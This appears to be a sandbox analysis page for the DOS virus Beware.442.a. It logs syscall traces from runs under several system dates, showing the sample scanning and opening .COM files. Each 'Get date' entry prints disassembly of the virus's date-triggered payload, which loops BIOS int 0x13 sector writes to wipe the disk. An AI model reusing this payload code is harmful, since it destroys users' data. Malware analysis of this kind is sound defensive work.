Sample viewer

vx.netlux.org/Virus.DOS.Beware.442.a

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:29:44.216741282Z	26	PC: 13bc6 \| Set disk transfer address
2018-12-17T22:29:44.219938417Z	78	PC: 13bd1 \| Find first file
2018-12-17T22:29:44.227077664Z	61	PC: 13be7 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:29:44.235247411Z	87	PC: 13bf9 \| Get or set file date and time
2018-12-17T22:29:44.23767145Z	63	PC: 13c0c \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:29:44.245271925Z	66	PC: 13cb1 \| Move file pointer
2018-12-17T22:29:44.247259425Z	62	PC: 13cb6 \| Close file
2018-12-17T22:29:44.249616716Z	79	PC: 13bdc \| Find next file
2018-12-17T22:29:44.25331024Z	61	PC: 13be7 \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:29:44.260881758Z	87	PC: 13bf9 \| Get or set file date and time
2018-12-17T22:29:44.262887503Z	63	PC: 13c0c \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:29:44.271739911Z	66	PC: 13cb1 \| Move file pointer
2018-12-17T22:29:44.274508383Z	62	PC: 13cb6 \| Close file
2018-12-17T22:29:44.277612756Z	79	PC: 13bdc \| Find next file
2018-12-17T22:29:44.28108514Z	61	PC: 13be7 \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:29:44.289445476Z	87	PC: 13bf9 \| Get or set file date and time
2018-12-17T22:29:44.291077234Z	63	PC: 13c0c \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:29:44.298050739Z	66	PC: 13cb1 \| Move file pointer
2018-12-17T22:29:44.300410659Z	62	PC: 13cb6 \| Close file
2018-12-17T22:29:44.302596465Z	79	PC: 13bdc \| Find next file
2018-12-17T22:29:44.305832392Z	61	PC: 13be7 \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:29:44.314313579Z	87	PC: 13bf9 \| Get or set file date and time
2018-12-17T22:29:44.316155385Z	63	PC: 13c0c \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:29:44.32333416Z	66	PC: 13cb1 \| Move file pointer
2018-12-17T22:29:44.326228301Z	62	PC: 13cb6 \| Close file
2018-12-17T22:29:44.328497177Z	79	PC: 13bdc \| Find next file
2018-12-17T22:29:44.331943676Z	61	PC: 13be7 \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:29:44.340551632Z	87	PC: 13bf9 \| Get or set file date and time
2018-12-17T22:29:44.343633272Z	63	PC: 13c0c \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:29:44.351701596Z	66	PC: 13cb1 \| Move file pointer
2018-12-17T22:29:44.353556359Z	62	PC: 13cb6 \| Close file
2018-12-17T22:29:44.356615405Z	79	PC: 13bdc \| Find next file
2018-12-17T22:29:44.360189883Z	61	PC: 13be7 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:29:44.368930951Z	87	PC: 13bf9 \| Get or set file date and time
2018-12-17T22:29:44.372242441Z	63	PC: 13c0c \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:29:44.380061192Z	66	PC: 13cb1 \| Move file pointer
2018-12-17T22:29:44.382199689Z	62	PC: 13cb6 \| Close file
2018-12-17T22:29:44.386924014Z	79	PC: 13bdc \| Find next file
2018-12-17T22:29:44.390286193Z	61	PC: 13be7 \| Open file (Filename = 'PAH.COM')
2018-12-17T22:29:44.398852485Z	87	PC: 13bf9 \| Get or set file date and time
2018-12-17T22:29:44.401678453Z	63	PC: 13c0c \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:29:44.40992582Z	66	PC: 13cb1 \| Move file pointer
2018-12-17T22:29:44.412017966Z	62	PC: 13cb6 \| Close file
2018-12-17T22:29:44.414932932Z	79	PC: 13bdc \| Find next file
2018-12-17T22:29:44.420303586Z	61	PC: 13be7 \| Open file (Filename = 'TEST.COM')
2018-12-17T22:29:44.428741707Z	87	PC: 13bf9 \| Get or set file date and time
2018-12-17T22:29:44.431234411Z	63	PC: 13c0c \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:29:44.43431806Z	66	PC: 13cb1 \| Move file pointer
2018-12-17T22:29:44.435957577Z	66	PC: 13ca7 \| Move file pointer
2018-12-17T22:29:44.43827121Z	63	PC: 13c40 \| Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:29:44.441977111Z	62	PC: 13cb6 \| Close file
2018-12-17T22:29:44.444409477Z	79	PC: 13bdc \| Find next file
2018-12-17T22:29:44.447507973Z	42	PC: 13d03 \| Get date 0x13d03: cmp dl, 1 0x13d06: jne 0x13d1c 0x13d08: cmp al, 1 0x13d0a: jne 0x13d1c 0x13d0c: mov ax, 0x30f 0x13d0f: mov cx, 1 0x13d12: xor dh, dh 0x13d14: mov dl, 0 0x13d16: int 0x13 0x13d18: inc ch 0x13d1a: jmp 0x13d16 0x13d1c: ret 0x13d1d: mov word ptr [0x91b3], ax 0x13d20: dec bp 0x13d21: lea di, word ptr [bx + di] 0x13d23: jne 0x13d4f 0x13d25: inc bx 0x13d27: dec di 0x13d28: dec bp 0x13d29: add byte ptr [bx + di], al
2018-12-17T22:29:44.451002228Z	48	PC: 12abd \| Get DOS version
2018-12-17T22:29:44.452955981Z	64	PC: 12c84 \| Write file or device (Write 120 bytes on handle 1)
2018-12-17T22:29:44.461768874Z	64	PC: 12c84 \| Write file or device (Write 80 bytes on handle 1)
2018-12-17T22:29:44.484084171Z	64	PC: 12c84 \| Write file or device (Write 80 bytes on handle 1)
2018-12-17T22:29:44.49310557Z	64	PC: 12c6f \| Write file or device (Write 80 bytes on handle 1)
2018-12-17T22:29:44.501632389Z	64	PC: 12c6f \| Write file or device (Write 80 bytes on handle 1)
2018-12-17T22:29:44.510892271Z	64	PC: 12c6f \| Write file or device (Write 80 bytes on handle 1)
2018-12-17T22:29:44.518656961Z	64	PC: 12c6f \| Write file or device (Write 80 bytes on handle 1)
2018-12-17T22:29:44.528166784Z	64	PC: 12c6f \| Write file or device (Write 80 bytes on handle 1)
2018-12-17T22:29:44.536722655Z	64	PC: 12c84 \| Write file or device (Write 80 bytes on handle 1)
2018-12-17T22:29:44.544298178Z	64	PC: 12c84 \| Write file or device (Write 80 bytes on handle 1)
2018-12-17T22:29:44.552131641Z	64	PC: 12c84 \| Write file or device (Write 80 bytes on handle 1)
2018-12-17T22:29:44.576632897Z	76	PC: 12a71 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5316,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:54:12.606874335Z	26	PC: 13bc6 \| Set disk transfer address
2018-12-25T11:54:12.608321035Z	78	PC: 13bd1 \| Find first file
2018-12-25T11:54:12.615995496Z	61	PC: 13be7 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:54:12.623557907Z	87	PC: 13bf9 \| Get or set file date and time
2018-12-25T11:54:12.625510853Z	63	PC: 13c0c \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:54:12.633923883Z	66	PC: 13cb1 \| Move file pointer
2018-12-25T11:54:12.644580854Z	62	PC: 13cb6 \| Close file
2018-12-25T11:54:12.646597449Z	79	PC: 13bdc \| Find next file
2018-12-25T11:54:12.650210091Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.664868343Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.6668333Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.675713773Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.678016803Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.680101391Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.696936804Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.705268998Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.707362223Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.715030634Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.718186006Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.720706508Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.723848451Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.732528028Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.73452616Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.742204634Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.745564425Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.748483876Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.751492081Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.759870034Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.761504237Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.768746444Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.77066751Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.773765002Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.777149404Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.785076233Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.787970586Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.795515785Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.797559038Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.800641361Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.803857836Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.811460473Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.813913585Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.822000767Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.824059349Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.827162846Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.830156381Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.837449385Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.839624984Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.84271663Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.844625038Z	66	PC: 13ca7 \| Move file pointer
2018-12-25T11:54:12.846555226Z	63	PC: 13c40 \| Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:54:12.850609849Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.852994138Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.856093877Z	42	PC: 13d03 \| Get date 0x13d03: cmp dl, 1 0x13d06: jne 0x13d1c 0x13d08: cmp al, 1 0x13d0a: jne 0x13d1c 0x13d0c: mov ax, 0x30f 0x13d0f: mov cx, 1 0x13d12: xor dh, dh 0x13d14: mov dl, 0 0x13d16: int 0x13 0x13d18: inc ch 0x13d1a: jmp 0x13d16 0x13d1c: ret 0x13d1d: rcr byte ptr [bp - 0x67], 0x4d 0x13d21: lea di, word ptr [bx + di] 0x13d23: jne 0x13d4f 0x13d25: inc bx 0x13d27: dec di 0x13d28: dec bp 0x13d29: add byte ptr [bx + di], al 0x13d2b: aas
2018-12-25T11:54:12.85980186Z	48	PC: 12abd \| Get DOS version
2018-12-25T11:54:12.861937967Z	64	PC: 12c84 \| Write file or device (Write 120 bytes on handle 1)
2018-12-25T11:54:12.870864423Z	64	PC: 12c84 \| Write file or device (See above)
2018-12-25T11:54:12.87889234Z	64	PC: 12c84 \| Write file or device (See above)
2018-12-25T11:54:12.887347037Z	64	PC: 12c6f \| Write file or device (Write 80 bytes on handle 1)
2018-12-25T11:54:12.894796408Z	64	PC: 12c6f \| Write file or device (See above)
2018-12-25T11:54:12.903559991Z	64	PC: 12c6f \| Write file or device (See above)
2018-12-25T11:54:12.911446005Z	64	PC: 12c6f \| Write file or device (See above)
2018-12-25T11:54:12.919654028Z	64	PC: 12c6f \| Write file or device (See above)
2018-12-25T11:54:12.928410949Z	64	PC: 12c84 \| Write file or device (See above)
2018-12-25T11:54:12.935555332Z	64	PC: 12c84 \| Write file or device (See above)
2018-12-25T11:54:12.942943715Z	64	PC: 12c84 \| Write file or device (See above)
2018-12-25T11:54:12.951136734Z	76	PC: 12a71 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5316,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:54:12.689526664Z	26	PC: 13bc6 \| Set disk transfer address
2018-12-25T11:54:12.691204018Z	78	PC: 13bd1 \| Find first file
2018-12-25T11:54:12.697256335Z	61	PC: 13be7 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:54:12.703740381Z	87	PC: 13bf9 \| Get or set file date and time
2018-12-25T11:54:12.705517084Z	63	PC: 13c0c \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:54:12.712033686Z	66	PC: 13cb1 \| Move file pointer
2018-12-25T11:54:12.713614147Z	62	PC: 13cb6 \| Close file
2018-12-25T11:54:12.716128042Z	79	PC: 13bdc \| Find next file
2018-12-25T11:54:12.718573699Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.726698782Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.729434618Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.735848768Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.750762571Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.753092296Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.756496446Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.762833626Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.764229894Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.771306974Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.772674644Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.775151698Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.778650136Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.785150154Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.786506238Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.793134962Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.794409685Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.79629605Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.799316376Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.806917864Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.808939196Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.816690164Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.818091196Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.819826323Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.822575457Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.829335162Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.831048295Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.83814248Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.839739722Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.841717013Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.845643292Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.852486636Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.854107935Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.860749906Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.862921055Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.864668616Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.86722033Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.874046596Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.875356845Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.877808051Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.87977218Z	66	PC: 13ca7 \| Move file pointer
2018-12-25T11:54:12.881917459Z	63	PC: 13c40 \| Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:54:12.885545306Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.887854393Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.890371832Z	42	PC: 13d03 \| Get date 0x13d03: cmp dl, 1 0x13d06: jne 0x13d1c 0x13d08: cmp al, 1 0x13d0a: jne 0x13d1c 0x13d0c: mov ax, 0x30f 0x13d0f: mov cx, 1 0x13d12: xor dh, dh 0x13d14: mov dl, 0 0x13d16: int 0x13 0x13d18: inc ch 0x13d1a: jmp 0x13d16 0x13d1c: ret 0x13d1d: rcr byte ptr [bp - 0x67], 0x4d 0x13d21: lea di, word ptr [bx + di] 0x13d23: jne 0x13d4f 0x13d25: inc bx 0x13d27: dec di 0x13d28: dec bp 0x13d29: add byte ptr [bx + di], al 0x13d2b: aas
2018-12-25T11:54:12.892790946Z	48	PC: 12abd \| Get DOS version
2018-12-25T11:54:12.894766625Z	64	PC: 12c84 \| Write file or device (Write 120 bytes on handle 1)
2018-12-25T11:54:12.902218794Z	64	PC: 12c84 \| Write file or device (See above)
2018-12-25T11:54:12.908175929Z	64	PC: 12c84 \| Write file or device (See above)
2018-12-25T11:54:12.915864448Z	64	PC: 12c6f \| Write file or device (Write 80 bytes on handle 1)
2018-12-25T11:54:12.922452149Z	64	PC: 12c6f \| Write file or device (See above)
2018-12-25T11:54:12.92969709Z	64	PC: 12c6f \| Write file or device (See above)
2018-12-25T11:54:12.937015956Z	64	PC: 12c6f \| Write file or device (See above)
2018-12-25T11:54:12.944318345Z	64	PC: 12c6f \| Write file or device (See above)
2018-12-25T11:54:12.950601481Z	64	PC: 12c84 \| Write file or device (See above)
2018-12-25T11:54:12.956755317Z	64	PC: 12c84 \| Write file or device (See above)
2018-12-25T11:54:12.96364222Z	64	PC: 12c84 \| Write file or device (See above)
2018-12-25T11:54:12.96978552Z	76	PC: 12a71 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5316,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:54:12.841043584Z	26	PC: 13bc6 \| Set disk transfer address
2018-12-25T11:54:12.843682149Z	78	PC: 13bd1 \| Find first file
2018-12-25T11:54:12.849983485Z	61	PC: 13be7 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:54:12.856727631Z	87	PC: 13bf9 \| Get or set file date and time
2018-12-25T11:54:12.85947075Z	63	PC: 13c0c \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:54:12.868254817Z	66	PC: 13cb1 \| Move file pointer
2018-12-25T11:54:12.869947354Z	62	PC: 13cb6 \| Close file
2018-12-25T11:54:12.872551035Z	79	PC: 13bdc \| Find next file
2018-12-25T11:54:12.875385795Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.882045276Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.883983154Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.9030015Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.907182962Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.909853837Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.912967871Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.919811994Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.921861354Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.929449659Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.931150404Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.933256193Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.936879467Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.943388215Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.947554411Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.954909443Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.956288099Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.958037339Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.96179181Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.969237346Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.971010355Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:12.978062269Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:12.979473343Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:12.981220734Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:12.984350509Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:12.991213138Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:12.99314083Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:13.000474301Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:13.002437031Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:13.004727177Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:13.008433026Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:13.015151035Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:13.017311988Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:13.024656808Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:13.026512805Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:13.02862938Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:13.032405417Z	61	PC: 13be7 \| Open file (See above)
2018-12-25T11:54:13.039968714Z	87	PC: 13bf9 \| Get or set file date and time (See above)
2018-12-25T11:54:13.041576315Z	63	PC: 13c0c \| Read file or device (See above)
2018-12-25T11:54:13.045109767Z	66	PC: 13cb1 \| Move file pointer (See above)
2018-12-25T11:54:13.047120315Z	66	PC: 13ca7 \| Move file pointer
2018-12-25T11:54:13.048695525Z	63	PC: 13c40 \| Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:54:13.051991717Z	62	PC: 13cb6 \| Close file (See above)
2018-12-25T11:54:13.054631659Z	79	PC: 13bdc \| Find next file (See above)
2018-12-25T11:54:13.057184926Z	42	PC: 13d03 \| Get date 0x13d03: cmp dl, 1 0x13d06: jne 0x13d1c 0x13d08: cmp al, 1 0x13d0a: jne 0x13d1c 0x13d0c: mov ax, 0x30f 0x13d0f: mov cx, 1 0x13d12: xor dh, dh 0x13d14: mov dl, 0 0x13d16: int 0x13 0x13d18: inc ch 0x13d1a: jmp 0x13d16 0x13d1c: ret 0x13d1d: rcr byte ptr [bp - 0x67], 0x4d 0x13d21: lea di, word ptr [bx + di] 0x13d23: jne 0x13d4f 0x13d25: inc bx 0x13d27: dec di 0x13d28: dec bp 0x13d29: add byte ptr [bx + di], al 0x13d2b: aas